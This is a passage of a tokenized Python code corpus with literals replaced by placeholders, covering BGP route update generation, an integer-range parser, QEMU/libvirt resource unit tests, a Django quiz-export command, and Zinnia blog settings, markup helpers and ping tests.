change in full_dict_change . iteritems ( ) : <EOL> family = change . nlri . family ( ) <EOL> announced = self . _seen . get ( family , { } ) <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> if nlri_index in announced : <EOL> old_change = announced [ nlri_index ] <EOL> if old_change . attributes . index ( ) == change . attributes . index ( ) and old_change . nlri . nexthop . index ( ) == change . nlri . nexthop . index ( ) : <EOL> continue <EOL> elif change . nlri . action == OUT . WITHDRAW : <EOL> if nlri_index not in announced : <EOL> if dict_nlri [ nlri_index ] . nlri . action == OUT . ANNOUNCE : <EOL> continue <EOL> dict_change [ nlri_index ] = change <EOL> else : <EOL> dict_change = full_dict_change <EOL> if not dict_change : <EOL> continue <EOL> attributes = dict_attr [ attr_index ] . attributes <EOL> changed = list ( dict_change . itervalues ( ) ) <EOL> if grouped : <EOL> updates = [ ] <EOL> nlris = [ ] <EOL> for change in dict_change . values ( ) : <EOL> if change . nlri . afi == AFI . ipv4 : <EOL> nlris . append ( change . nlri ) <EOL> continue <EOL> updates . append ( Update ( [ change . nlri ] , attributes ) ) <EOL> if nlris : <EOL> updates . append ( Update ( nlris , attributes ) ) <EOL> nlris = [ ] <EOL> for change in changed : <EOL> nlri_index = change . index ( ) <EOL> del dict_sorted [ attr_index ] [ nlri_index ] <EOL> del dict_nlri [ nlri_index ] <EOL> for update in updates : <EOL> yield update <EOL> else : <EOL> updates = [ ] <EOL> for change in changed : <EOL> updates . append ( Update ( [ change . nlri , ] , attributes ) ) <EOL> nlri_index = change . index ( ) <EOL> del dict_sorted [ attr_index ] [ nlri_index ] <EOL> del dict_nlri [ nlri_index ] <EOL> for update in updates : <EOL> yield update <EOL> if self . cache : <EOL> announced = self . _seen <EOL> for change in changed : <EOL> if change . nlri . action == OUT . ANNOUNCE : <EOL> announced . setdefault ( change . nlri . family ( ) , { } ) [ change . index ( ) ] = change <EOL> else : <EOL> family = change . nlri . family ( ) <EOL> if family in announced : <EOL> announced [ family ] . pop ( change . index ( ) , None ) <EOL> if rr_announced : <EOL> for afi , safi in rr_announced : <EOL> self . _enhanced_refresh_start . remove ( ( afi , safi ) ) <EOL> yield Update ( RouteRefresh ( afi , safi , RouteRefresh . end ) , Attributes ( ) ) <EOL> for change in self . _enhanced_refresh_delay : <EOL> self . insert_announced ( change , True ) <EOL> self . enhanced_refresh_delay = [ ] <EOL> for update in self . updates ( grouped ) : <EOL> yield update </s>
<s> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> import re <EOL> def unpack_integer_range ( integerrange ) : <EOL> """<STR_LIT>""" <EOL> integers = [ ] <EOL> valid_chars = re . compile ( "<STR_LIT>" ) <EOL> if re . match ( valid_chars , integerrange ) is None : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> integerrange . replace ( "<STR_LIT:U+0020>" , "<STR_LIT>" ) <EOL> rangeparts = integerrange . split ( '<STR_LIT:U+002C>' ) <EOL> for rangepart in rangeparts : <EOL> rangemaxmin = rangepart . split ( '<STR_LIT:->' ) <EOL> if len ( rangemaxmin ) == <NUM_LIT:1> : <EOL> try : <EOL> integers . extend ( [ int ( rangemaxmin [ <NUM_LIT:0> ] ) ] ) <EOL> except ValueError : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> elif len ( rangemaxmin ) == <NUM_LIT:2> : <EOL> try : <EOL> rangemin = int ( rangemaxmin [ <NUM_LIT:0> ] ) <EOL> rangemax = int ( rangemaxmin [ <NUM_LIT:1> ] ) + <NUM_LIT:1> <EOL> except ValueError : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> if rangemin >= rangemax : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> integers . extend ( range ( rangemin , rangemax ) ) <EOL> else : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" % integerrange <EOL> return sorted ( integers ) </s>
<s> import mock <EOL> import libvirt <EOL> import difflib <EOL> import unittest <EOL> from see . context . resources import qemu <EOL> def compare ( text1 , text2 ) : <EOL> """<STR_LIT>""" <EOL> diff = difflib . ndiff ( str ( text1 ) . splitlines ( True ) , str ( text2 ) . splitlines ( True ) ) <EOL> return '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( diff ) <EOL> class DomainXMLTest ( unittest . TestCase ) : <EOL> def test_domain_xml ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_domain_xml_modifies ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_domain_xml_network ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' , network_name = '<STR_LIT:foo>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_domain_xml_network_modifies ( self ) : <EOL> """<STR_LIT>""" <EOL> config = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . domain_xml ( '<STR_LIT:foo>' , config , '<STR_LIT>' , network_name = '<STR_LIT:foo>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class DiskXMLTest ( unittest . TestCase ) : <EOL> def test_disk_xml ( self ) : <EOL> """<STR_LIT>""" <EOL> pool_config = """<STR_LIT>""" <EOL> disk_config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" <EOL> results = qemu . disk_xml ( '<STR_LIT:foo>' , pool_config , disk_config , False ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_disk_xml_modifies ( self ) : <EOL> """<STR_LIT>""" <EOL> pool_config = """<STR_LIT>""" <EOL> disk_config = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" <EOL> results = qemu . disk_xml ( '<STR_LIT:foo>' , pool_config , disk_config , False ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_disk_cow ( self ) : <EOL> """<STR_LIT>""" <EOL> pool_config = """<STR_LIT>""" <EOL> disk_config = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> results = qemu . disk_xml ( '<STR_LIT:foo>' , pool_config , disk_config , True ) <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class DomainCreateTest ( unittest . TestCase ) : <EOL> def test_create ( self ) : <EOL> """<STR_LIT>""" <EOL> xml = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . listNetworks . return_value = [ ] <EOL> with mock . patch ( '<STR_LIT>' , mock . mock_open ( read_data = xml ) , create = True ) : <EOL> qemu . domain_create ( hypervisor , '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' ) <EOL> results = hypervisor . defineXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_create_network ( self ) : <EOL> """<STR_LIT>""" <EOL> xml = """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . listNetworks . return_value = [ ] <EOL> with mock . patch ( '<STR_LIT>' , mock . mock_open ( read_data = xml ) , create = True ) : <EOL> qemu . domain_create ( hypervisor , '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' , network_name = '<STR_LIT:foo>' ) <EOL> results = hypervisor . defineXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class DomainDeleteTest ( unittest . TestCase ) : <EOL> def test_delete_destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = True <EOL> qemu . domain_delete ( domain , logger ) <EOL> self . assertTrue ( domain . destroy . called ) <EOL> def test_delete_destroy_error ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = True <EOL> domain . destroy . side_effect = libvirt . libvirtError ( "<STR_LIT>" ) <EOL> qemu . domain_delete ( domain , logger ) <EOL> self . assertTrue ( domain . undefineFlags . called ) <EOL> def test_delete_undefine ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = False <EOL> qemu . domain_delete ( domain , logger ) <EOL> self . assertTrue ( domain . undefineFlags . called ) <EOL> def test_delete_undefine_snapshots ( self ) : <EOL> """<STR_LIT>""" <EOL> domain = mock . Mock ( ) <EOL> logger = mock . Mock ( ) <EOL> domain . isActive . return_value = False <EOL> qemu . domain_delete ( domain , logger ) <EOL> domain . undefineFlags . assert_called_with ( libvirt . VIR_DOMAIN_UNDEFINE_SNAPSHOTS_METADATA ) <EOL> class PoolCreateTest ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create ( self , exists_mock , makedirs ) : <EOL> """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" <EOL> hypervisor = mock . Mock ( ) <EOL> exists_mock . return_value = False <EOL> qemu . pool_create ( hypervisor , '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> results = hypervisor . storagePoolCreateXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> makedirs . assert_called_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> class PoolDeleteTest ( unittest . TestCase ) : <EOL> def test_delete_destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> qemu . pool_delete ( pool , logger ) <EOL> self . assertTrue ( pool . destroy . called ) <EOL> def test_volume_deletion ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> volumes = { '<STR_LIT:foo>' : mock . Mock ( ) , '<STR_LIT:bar>' : mock . Mock ( ) , '<STR_LIT>' : mock . Mock ( ) } <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> pool . listVolumes . return_value = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> pool . storageVolLookupByName . side_effect = lambda n : volumes [ n ] <EOL> qemu . pool_delete ( pool , logger ) <EOL> volumes [ '<STR_LIT:foo>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT:bar>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> def test_volume_deletion_error ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> volumes = { '<STR_LIT:foo>' : mock . Mock ( ) , '<STR_LIT:bar>' : mock . Mock ( ) , '<STR_LIT>' : mock . Mock ( ) } <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> pool . listVolumes . return_value = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> pool . storageVolLookupByName . side_effect = lambda n : volumes [ n ] <EOL> volumes [ '<STR_LIT:foo>' ] . delete . side_effect = libvirt . libvirtError ( '<STR_LIT>' ) <EOL> qemu . pool_delete ( pool , logger ) <EOL> volumes [ '<STR_LIT:foo>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT:bar>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> volumes [ '<STR_LIT>' ] . delete . assert_called_with ( <NUM_LIT:0> ) <EOL> self . assertTrue ( pool . destroy . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_pool_folder ( self , os_mock , rm_mock ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> os_mock . return_value = True <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> qemu . pool_delete ( pool , logger ) <EOL> rm_mock . assert_called_with ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_pool_folder_error ( self , os_mock , rm_mock ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> logger = mock . Mock ( ) <EOL> os_mock . return_value = True <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> pool . destroy . side_effect = libvirt . libvirtError ( '<STR_LIT>' ) <EOL> qemu . pool_delete ( pool , logger ) <EOL> rm_mock . assert_called_with ( '<STR_LIT>' ) <EOL> class DiskCloneTest ( unittest . TestCase ) : <EOL> def test_clone ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . Mock ( ) <EOL> volume = mock . Mock ( ) <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . storageVolLookupByPath . return_value = volume <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> volume . XMLDesc . return_value = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> qemu . disk_clone ( hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , '<STR_LIT>' : { } } ) <EOL> results = pool . createXMLFrom . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_clone_cow ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . Mock ( ) <EOL> volume = mock . Mock ( ) <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . storageVolLookupByPath . return_value = volume <EOL> pool . XMLDesc . return_value = """<STR_LIT>""" <EOL> volume . XMLDesc . return_value = """<STR_LIT>""" + """<STR_LIT>""" <EOL> expected = """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" + """<STR_LIT>""" <EOL> qemu . disk_clone ( hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT>' : True } } ) <EOL> results = pool . createXML . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> results = results . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> self . assertEqual ( results , expected , compare ( results , expected ) ) <EOL> def test_clone_error ( self ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . Mock ( ) <EOL> hypervisor = mock . Mock ( ) <EOL> hypervisor . storageVolLookupByPath . side_effect = libvirt . libvirtError ( '<STR_LIT>' ) <EOL> with self . assertRaises ( RuntimeError ) as error : <EOL> qemu . disk_clone ( hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , '<STR_LIT>' : { } } ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> class ResourcesTest ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_default ( self , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> libvirt_mock . open . assert_called_with ( '<STR_LIT>' ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_hypervisor ( self , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> libvirt_mock . open . assert_called_with ( '<STR_LIT>' ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_clone ( self , pool_mock , disk_mock , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> pool = mock . MagicMock ( ) <EOL> pool_mock . return_value = pool <EOL> volume = mock . Mock ( ) <EOL> volume . path . return_value = '<STR_LIT>' <EOL> pool . storageVolLookupByName . return_value = volume <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } ) <EOL> pool_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> disk_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , pool , { '<STR_LIT:image>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = None ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_initialize_network ( self , network_mock , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> network = mock . Mock ( ) <EOL> network . name . return_value = '<STR_LIT>' <EOL> network_mock . return_value = network <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> network_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> create_mock . assert_called_with ( resources . hypervisor , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , network_name = '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_cleanup ( self , delete_mock , pool_delete_mock , network_delete_mock , create_mock , libvirt_mock ) : <EOL> """<STR_LIT>""" <EOL> resources = qemu . QEMUResources ( '<STR_LIT:foo>' , { '<STR_LIT>' : '<STR_LIT:bar>' , '<STR_LIT>' : { '<STR_LIT:image>' : '<STR_LIT>' } } ) <EOL> resources . _domain = mock . Mock ( ) <EOL> resources . _network = mock . Mock ( ) <EOL> resources . _hypervisor = mock . Mock ( ) <EOL> resources . _storage_pool = mock . Mock ( ) <EOL> resources . cleanup ( ) <EOL> delete_mock . assert_called_with ( resources . domain , mock . ANY ) <EOL> pool_delete_mock . assert_called_with ( resources . storage_pool , mock . ANY ) <EOL> network_delete_mock . assert_called_with ( resources . network ) <EOL> self . assertTrue ( resources . _hypervisor . close . called ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from . win_soup import WinSoup </s>
<s> import sys <EOL> from os . path import basename <EOL> from django . core . management . base import BaseCommand <EOL> from django . template import Template , Context <EOL> from yaksh . models import Quiz , QuestionPaper <EOL> result_template = Template ( '''<STR_LIT>''' ) <EOL> def results2csv ( filename , stdout ) : <EOL> """<STR_LIT>""" <EOL> qs = Quiz . objects . all ( ) <EOL> if len ( qs ) > <NUM_LIT:1> : <EOL> print "<STR_LIT>" <EOL> for q in qs : <EOL> stdout . write ( '<STR_LIT>' % ( q . id , q . description ) ) <EOL> quiz_id = int ( raw_input ( "<STR_LIT>" ) ) <EOL> try : <EOL> quiz = Quiz . objects . get ( id = quiz_id ) <EOL> except Quiz . DoesNotExist : <EOL> stdout . write ( "<STR_LIT>" % quiz_id ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> quiz = qs [ <NUM_LIT:0> ] <EOL> papers = QuestionPaper . objects . filter ( quiz = quiz , <EOL> user__profile__isnull = False ) <EOL> stdout . write ( "<STR_LIT>" % ( quiz . description , <EOL> basename ( filename ) ) ) <EOL> f = open ( filename , '<STR_LIT:w>' ) <EOL> context = Context ( { '<STR_LIT>' : papers } ) <EOL> f . write ( result_template . render ( context ) ) <EOL> f . close ( ) <EOL> stdout . write ( '<STR_LIT>' ) <EOL> class Command ( BaseCommand ) : <EOL> args = '<STR_LIT>' <EOL> help = '''<STR_LIT>''' <EOL> def handle ( self , * args , ** options ) : <EOL> """<STR_LIT>""" <EOL> results2csv ( args [ <NUM_LIT:0> ] , self . stdout ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> gettext = lambda s : s <EOL> DEBUG = True <EOL> DATABASES = { '<STR_LIT:default>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> USE_TZ = True <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> SITE_ID = <NUM_LIT:1> <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> LANGUAGES = ( <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , gettext ( '<STR_LIT>' ) ) , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> } <EOL> ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> from zinnia . xmlrpc import ZINNIA_XMLRPC_METHODS <EOL> XMLRPC_METHODS = ZINNIA_XMLRPC_METHODS </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> from django . utils . encoding import force_text <EOL> from django . utils . encoding import force_bytes <EOL> from zinnia . settings import MARKDOWN_EXTENSIONS <EOL> from zinnia . settings import RESTRUCTUREDTEXT_SETTINGS <EOL> def textile ( value ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import textile <EOL> except ImportError : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> RuntimeWarning ) <EOL> return value <EOL> return textile . textile ( force_text ( value ) , <EOL> encoding = '<STR_LIT:utf-8>' , output = '<STR_LIT:utf-8>' ) <EOL> def markdown ( value , extensions = MARKDOWN_EXTENSIONS ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import markdown <EOL> except ImportError : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> RuntimeWarning ) <EOL> return value <EOL> return markdown . markdown ( force_text ( value ) , extensions = extensions ) <EOL> def restructuredtext ( value , settings = RESTRUCTUREDTEXT_SETTINGS ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from docutils . core import publish_parts <EOL> except ImportError : <EOL> warnings . warn ( "<STR_LIT>" , <EOL> RuntimeWarning ) <EOL> return value <EOL> parts = publish_parts ( source = force_bytes ( value ) , <EOL> writer_name = '<STR_LIT>' , <EOL> settings_overrides = settings ) <EOL> return force_text ( parts [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> raise ImproperlyConfigured ( '<STR_LIT>' ) <EOL> def backend ( entry ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from io import StringIO <EOL> from urllib . error import URLError <EOL> from urllib . response import addinfourl <EOL> except ImportError : <EOL> from urllib import addinfourl <EOL> from urllib2 import URLError <EOL> from cStringIO import StringIO <EOL> from django . test import TestCase <EOL> from zinnia . models . entry import Entry <EOL> from zinnia . ping import URLRessources <EOL> from zinnia . ping import DirectoryPinger <EOL> from zinnia . ping import ExternalUrlsPinger <EOL> from zinnia . signals import disconnect_entry_signals <EOL> class NoThreadMixin ( object ) : <EOL> def start ( self ) : <EOL> self . run ( ) <EOL> class NoThreadDirectoryPinger ( NoThreadMixin , DirectoryPinger ) : <EOL> pass <EOL> class NoThreadExternalUrlsPinger ( NoThreadMixin , ExternalUrlsPinger ) : <EOL> pass <EOL> class DirectoryPingerTestCase ( TestCase 